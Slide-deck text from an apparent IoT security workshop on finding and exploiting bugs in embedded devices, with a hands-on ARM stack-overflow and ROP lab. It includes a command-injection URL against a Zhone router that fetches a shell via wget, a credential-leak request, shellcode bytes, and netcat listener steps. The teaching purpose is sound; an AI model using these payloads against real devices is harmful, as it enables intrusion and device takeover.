This is a light training/presentation talk.
My name is Lyon Yang and I am an IoT hacker. I live in sunny Singapore where IoT is rapidly being deployed – in production. This walkthrough will aim to shed light on the subject of IoT, from finding vulnerabilities in IoT devices to getting shiny hash prompts.
Our journey starts with a holistic view of IoT security, the issues faced by IoT devices and the common mistakes made by IoT developers. Things will then get technical as we progress into a both ARM and MIPS exploitation, followed by a ‘hack-along-with-us’ workshop where you will be exploiting a commonly found IoT daemon. If you are new to IoT or a seasoned professional you will likely learn something new in this workshop.
https://www.iotvillage.org/#schedule
2. 1
• Hi everyone my name is Lyon Yang
• I hack IoT and embedded systems.
• I live in sunny Singapore.
• Singapore is a smart city with IoT already deployed.
• Taxi drivers in SG will become robots.
• I work at a company called Vantage Point
• Strongest technical team in Singapore/SE Asia.
• Large collective of passionate hackers.
• Working in the financial and government sectors.
3. 2
Today I want to share with you a story:
1 year ago, I set about to try and become the “corelan” of ARM
and MIPS exploitation - a formidable task!
I wanted to fully understand embedded systems and try to
contribute back into the community.
and in the process pop many shells!
4. 3
Who Am I ?
• I am a rather regular guy…
• Basic understanding of ASM and exploitation
• Attended some training events myself
• Corelan, HITB, OSCP
• Practice Makes Perfect
• I started buying embedded devices and ‘playing’
• Working on IoT till 2-3am most mornings.
5. 4
1990s
The state of IoT and embedded security.
• Equally as immature as the tools.
• “1990 called”- Send our bugs back
• Basic strcpy/memcpy exploits
• Not much privilege separation
• Unsecured host OS
• Backdoors are often ‘vendor features’
• Not all vendors care about security
6. 5
Attack Surface
Attack Surface of IoT
• Think of IoT devices as miniature computers
• ARM or MIPS CPU
• “Hard-Drive” is a memory IC
• Runs Linux (typically)
• Communicate over WiFi/Wired
• HTTPD, UnPnP, FTPD, SSHD, TelnetD
7. 6
At Vantage Point I work with IoT vendors within SE Asia
• Network Services (httpd/telnetd…)
• Found more stack overflows than you can count
• “Every string was insecurely handled”
• Admin “restricted” Shells
command1 | sh
sh
dumpmem/readmem
8. 7
Bugs
• Backdoor User(s)
• Security Implemented in Client Side
• Debug interfaces left active
• File Upload -> Shell
• Arbitrary File Read (../../../../)
• Command Injection
• Stack Overflows
• Unauthorized Remote Access via UPnP
9. 8
Developers typically modify open source software
• Customized to meet their own needs.
• MicroHTTPD, BusyBox.
• This requires you are a strong C, C++ Developer
• Most developers now-a-days, are not so strong.
• Customizations exactly where we find bugs.
• Stack Overflows in vendor modifications
• Additional File Handlers or HTTP Methods
• Authentication
• Password Reset
• Log File Access
10. 9
ZHONE
Zhone Technologies is a Global Leader in Fiber
Access Transformation for Service Provider and
Enterprise Networks!
• Based in the US
Reference
from
zhone.com
13. 12
Plaintext Passwords
All username and passwords usually found in the
backup settings file!
CVE-2014-8537– Exposed Plaintext Username &
Passwords
• Passwords found to be BASE64 encoded in
backup settings file.
GET /backupsettings.conf?
action=getConfig&sessionKey=
15. 14
Command Injection (HTTPD)
Favourite way to look for Command Injection via IDA Pro:
Search for keyword “shell” in IDA PRO:
Sample
Exploit:
/zhnping.cmd?
&test=traceroute&sessionKey=985703201&ipA
ddr=192.168.1.1|wget%20h5p://
192.168.1.17/shell%20-‐O%20/tmp/
shell&Wl=30&wait=3&queries=3
20. 19
Cache Incoherency
• Self-modifying code (Encoder/Decoder) would
commonly cause Cache Incoherency
• Instructions stored in Instruction Cache will
execute instead of Data Cache
• Modified Shellcode is stored in Data Cache and
will not execute
Reference:
hWp://community.arm.com/groups/processors/blog/2010/02/17/caches-‐and-‐self-‐modifying-‐code
21. 20
Overcome Cache Incoherency
• Flush the cache.
• Encode and decode only the data portion of the
shellcode.
Data is not considered as Instructions!
22. 21
Decoding Data
Decoder
Shellcode
(Instruc;ons)
Shellcode
(Encoded
Data)
Decode
Read
Data
Shellcode
(Decoded
Data)
Instruc;on
Cache
Data
Cache
23. 22
MIPS Exploit Writing
Clear Cache
à Use ROP Gadget to clear cache
ASLR
à Use ROP Gadget to jump to Stack
Bad Characters
à Wrote your own encoder
Auto-Respawn Process Monitoring
à Fork the Shellcode Process
25. 24
ARMEncoder
ARMCoder (Alpha Stage)
Ultimate tool to crafting your shellcode
• Mthumb encoder (Encodes all or part of your ARM Shellcodes)
• Provides you with an encoder
• Objdump your shellcode binary to specific formats like C: "x41x42x43x44”
Upcoming features
• Detects for bad characters
• 32bit encoder
• Generates Shellcode
• Accept other forms of shellcode input. (Currently only supports reading from binary)
• Added support for MIPS Architecture
Download Link: https://github.com/l0Op3r/ARMCoder
26. 25
ARM Exploitation Workshop
• Triggering stack overflows to ARM shell.
• Learn ASLR bypass with ROP the ARM way
• Learn briefly how to read shellcode for the ARM
architecture
• Get your shiny Hash Prompt!
27. 26
Required Setup
Requires:
Kali with Python
SSID: random2
Password: iotvillage!
(small caps)
Credentials on the piece of paper.
ssh <userid>@192.168.1.<ip>
28. 27
Setup
Step 1: Download materials on your client
wget http://192.168.1.1:8000/materials.tar
wget http://192.168.1.1:8000/lyonslides.pdf
Step 2: Extract materials
tar –xvf materials.tar
Use any of the assigned ports to listen on from the server.
Port <As Assigned>
29. 28
What are we hacking?
Buffer overflow in two applications:
• Simple Bufferoverflow without ASLR
~/materials/server/practicelab1/httpdserver
• Bufferoverflow with ASLR
Hint use ROP Gadgets from binary “server”
~/materials/server/practicelab2/server
30. 29
StackOverflow x41x41x41x41
What is a Stack Overflow?
Program tries to use more memory space than the
call stack has available.
Register
PC
(Program
Counter)
Register
SP
(Stack
Pointer)
AAAAAA
AAAAAA
AAAAAA
AAAAn
Saved
$PC
Strcpy()
writes
this
way
31. 30
Running Server with GDB
On Server:
1. cd /home/hacker1/materials/server/practice_lab1/
./httpdserver < Any port you are assigned to>
2. Example:
Enter: ./httpdserver 10000 &
3. Output: [2324] ß Process ID
4. gdb attach <PID>
Example: gdb attach 2324
5. Press continue in gdb:
c
33. 32
Running Exploit
Python script sends 950 ‘A’s to server
On Client (Kali Linux):
1. cd materials/client/
2. python arm_practice_lab_0.py <Assigned Server
IP> <Port you run server on>
Example: python arm_practice_lab_0.py 192.168.1.4
10000
37. 36
Register r15/PC
What is the program counter (PC) used for?
Address (Location) of next instruction to be
executed.
As each instruction gets fetched the program
counter increases its value by 2 or 4
Register
PC
(Program
Counter)
Register
SP
(Stack
Pointer)
AAAAAA
AAAAAA
AAAAAA
AAAAn
AAAA
Strcpy()
writes
this
way
Calculate
Offset
to
$PC
38. 37
OFFSETS
How do we locate the offset to PC?
Client:
• /usr/share/metasploit-framework/tools/
pattern_create.rb 950
39. 38
OFFSETS
Client:
In the python script “arm_practice_lab_0.py” modify “buffer”:
Copy and paste the pattern generated by pattern_create.rb
Example: buffer = “aAbB-----yYzZ”
Run edited python script:
python arm_practice_lab_0.py <Assigned Server IP> <Port you run
server on>
Answer in: materials/client/answers/arm_practice_lab_1.py
40. 39
Server:
1. Type
“info
registers”
or
“i
r”
in
gdb
2. Copy
address
in
Program
Counter
Register
(PC)
Example:0x72413970
Getting the pattern offset
41. 40
Locating offset to PC
Client:
1. Enter the following command:
/usr/share/metasploit-framework/tools/pattern_offset.rb <Copied Address>
2. Modify python script to confirm the offset is correct:
buffer= 'A'*508
buffer+= 'B'*4
buffer+= ‘C’ * (950 – len(buffer))
Answer
in:
materials/client/answers/arm_pracNce_lab_2.py
3. Run edited python script
(On the server remember to Re-‐run
h5pdserver
and
aWach
with
gdb):
python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on>
42. 41
Where to put our shellcode?
Server:
1. Confirm that register PC has been overwritten by
‘x42x42x42x42’ by typing the following in gdb :
“i r”
2. Find out where the stack pointer is pointing to?
By typing the following in gdb:
“x/8a $sp-4”
3. Copy the address stored at register $sp address.
Example: 0x7efff680
44. 43
Add stack location to the script
Client:
1. Modify python script to confirm that the PC has
jumped to the right location:
buffer='A'*508
buffer+='x80xf6xffx7e'
buffer += 'C' * (950-len(buffer)) ßShellcode
Answer in: materials/client/answers/
arm_practice_lab_3.py
45. 44
Shellcoding
Why learn shellcoding?
Lots of shellcodes to be used for free online!
In Exploit Development, there will be a lot of hoops
and obstacles to jump through:
- Modification to shellcode
- Bad Characters
46. 45
Bad Characters!
Common Bad Characters:
“x00x20x0a”
Functions like strcpy() terminate after null byte!
Common solution:
Encode the shellcode!
48. 47
Important ARM Instructions
MOV r1, #1
Moving #1 to register r1
ADD r1, r2, #3
Adding #3 to Register R2 and moving it to R1
SUB r1, r2, #3
Subtracting #3 from R2 and moving it to R1
49. 48
Important ARM Instructions
SVC 1
Service Call –
syscall() is a small library function that invokes the system
call whose assembly language interface has the specified
number with the specified arguments.
LDR r5, [pc, #4]
Load value from Address Location (Register R3 with offset #4)
into R5
STR r4, [pc, #4]
Take value from register R4 and store it at Address Location
(Register R3 with offset #4)
50. 49
Important ARM Instructions
Branch (B, BL, BX, BLX, and BXJ) instructions
Branch like Jump Instructions (JMP) in x86
Example:
B R3
http://infocenter.arm.com/help/index.jsp?topic=/
com.arm.doc.dui0204j/Cihfddaf.html
51. 50
SYSCALL
Where to find the syscall offset to use?
# cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep execve
#define __NR_execve (__NR_SYSCALL_BASE+ 11)
Register r7 is used to store the location of the syscall to execute
58. 57
Fork Shellcode
Why Fork()?
• More stable exploit as shellcode process is
spawned as a new process
• A process that monitors critical services for
failure and respawns/kills process. (Commonly
found in embedded devices)
60. 59
Server:
1. Dump forkshellcode binary in python format:
• cd ~/materials/client
• python ARMCoder.py –be –scb ~/materials/
shellcode/fork_shellcode
61. 60
`
Client:
1. Copy output and paste into python script. Replace ‘C’ with shellcode:
(May want to edit: materials/client/answers/arm_practice_lab_4.py)
buffer+='x80xf6xffx7e’
buffer+=("xe2x8fx10x01”
"xe1x2fxffx11”
…
"x00x68x00x00")
2. Listen on port 31337:
nc –lvp 31337
3. Run edited python script:
(Remember to Re-run httpdserver and attach with gdb on the server):
python arm_practice_lab_0.py <Assigned Server IP> <Port you run
server on>
4. Check for shell on netcat listener
63. 62
Common Problem
What is ASLR?
Address space layout randomization (ASLR) is a computer
security technique involved in protection from buffer
overflow attacks.
Addresses of Stack and Libraries most of the time
randomized!
64. 63
ROPGadgets
Return-Oriented Programming (ROP):
Attacker uses control of the call stack to indirectly
execute machine instructions
In simple terms, finding and executing machine
instructions found in the httpd binary or libraries.
65. 64
Locating the Right ROPGadget
1. Look for a pivot(ROP GADGET) to jump to stack
Hint:
2. Set and hit Breakpoint in the vulnerable server
In GDB: b *0x<address>
Tools to use:
Johnathan Salwan Tool: ROPGadget.py
OBJDUMP–d <binary>
67. 66
ROPGadget
Server:
3. Copy
ROP
Gadget
loca;on
8714:
e28d600c
add
r6,
sp,
#12
8718:
e12fff16
bx
r6
4. Run
materials/server/pracNcelab2/server
<Assigned
Port>
and
aWach
to
gdb
3. In
gdb
set
breakpoint
at
0x8714
and
con;nue:
b
*0x8714
c
68. 67
ROPGadget
Client:
1. Offset has been calculated and located at 520. Modify
python script “python arm_practice_lab2_0.py” and add
ROP gadget to replace PC:
buffer = 'A'*520
buffer += 'x14x87’
Answer: materials/client/answers2/
arm_practice_lab2_1.py
2. Run edited python script:
python arm_practice_lab2_1.py <Assigned Server IP>
<Port you run server on>
69. 68
Breakpoint
Server:
1. Verify that breakpoint 0x8714 hits in the gdb session.
2. Step through code and copy where did the ROP Gadget jump
to:
• stepi
• stepi
• x/8a $pc-4
71. 70
Bad Characters!
Common Bad Characters:
“x00x20x0a”
Functions like strcpy() terminate after null byte!
So what do we normally do?
Encode the shellcode!
72. 71
How to use the ARMCoder
python ARMCoder.py
-scb <Binary>
-spos <starting offset to encode>
-epos <Ending offset to encode>
-be (Endianess)
77. 76
Modifying the Client Exploit
Client:
Modify python script to include the output from ARMCoder.py:
1. Add a NOP for an alignment issue with PC:
nop_mthumb = 'xc0x46’
2. Copy the code mthumb code from ARMCoder:
mthumbmode = "x01x10x8fxe2x11xffx2fxe1”
3. Copy decoder code from ARMCoder:
decoder = "x49xf6x99x14xc9xf6x99x14x4cx21x5a
x23x7dx46xeex58x66x40xee
x50xc0x46x04x33x08x39x24x29xf7xda”
79. 78
Client
Client:
Edit the following python script:
materials/client/answers2/arm_practice_lab2_1.py
Note: Do not copy mthumb code (first two lines of shellcode
output by ARMCoder.py). Remove from shellcode:
"x01x10x8fxe2”"x11xffx2fxe1"
mthumb code already added the mthumb code in the initial stage.
1. Copy shellcode output from ARMCoder into python script:
shellcode = ("x01x24xb6x1b”
…
"xf1x99x99x99")
82. 81
Modifying the Client Exploit
Client:
1. Add all required variables to the buffer in the python script:
buffer = mthumbmode + nop_mthumb + decoder +shellcode
buffer += 'A'*(520-len(buffer))
buffer += 'x14x87’
s.send(buffer)
2. Listen on port 31337:
nc –lvp 31337
3. Run edited python script:
python arm_practice_lab2_2.py <Assigned Server IP> <Port you run
server on>
85. 84
Register PC Alignment Problem
Why add a NOP?!
Ran through debugger, Shellcode decoded correctly
but shell does not return!
Program Counter often adjusts its offsets
automatically